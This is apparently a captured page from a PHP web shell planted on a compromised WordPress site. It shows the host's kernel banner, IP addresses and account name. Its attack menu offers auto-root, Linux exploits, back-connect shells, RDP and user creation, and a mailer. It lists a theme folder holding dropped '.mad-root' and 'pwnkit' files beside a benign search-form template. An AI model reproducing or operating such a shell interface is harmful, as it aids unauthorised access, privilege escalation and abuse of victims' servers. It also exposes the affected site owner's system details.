Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
927
B
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README.md
11.53
KB
-rw-r--r--
README_DEV.md
1.29
KB
-rw-r--r--
archive.php
1.33
KB
-rw-r--r--
comments.php
4.54
KB
-rw-r--r--
footer.php
840
B
-rw-r--r--
functions.php
4.28
KB
-rw-r--r--
header.php
1.8
KB
-rw-r--r--
index.php
1.9
KB
-rw-r--r--
page.php
1.23
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
10.64
KB
-rw-r--r--
rtl.css
480
B
-rw-r--r--
screenshot.png
620.53
KB
-rw-r--r--
search.php
1.54
KB
-rw-r--r--
searchform.php
917
B
-rw-r--r--
sidebar.php
1.23
KB
-rw-r--r--
single.php
1.58
KB
-rw-r--r--
style.css
2.07
KB
-rw-r--r--
theme.json
9.05
KB
-rw-r--r--
wpml-config.xml
297
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : searchform.php
<?php /** * Template for displaying search forms in Inspiro Lite * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.0.0 * @version 1.0.0 */ ?> <?php $unique_id = inspiro_unique_id( 'search-form-' ); ?> <form role="search" method="get" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>"> <label for="<?php echo esc_attr( $unique_id ); ?>"> <span class="screen-reader-text"><?php echo esc_html_x( 'Search for:', 'label', 'inspiro' ); ?></span> </label> <input type="search" id="<?php echo esc_attr( $unique_id ); ?>" class="search-field" placeholder="<?php echo esc_attr_x( 'Search …', 'placeholder', 'inspiro' ); ?>" value="<?php echo get_search_query(); ?>" name="s" /> <button type="submit" class="search-submit"><?php echo inspiro_get_theme_svg( 'search' ); ?><span><?php echo esc_html_x( 'Search', 'submit button', 'inspiro' ); ?></span></button> </form>
Close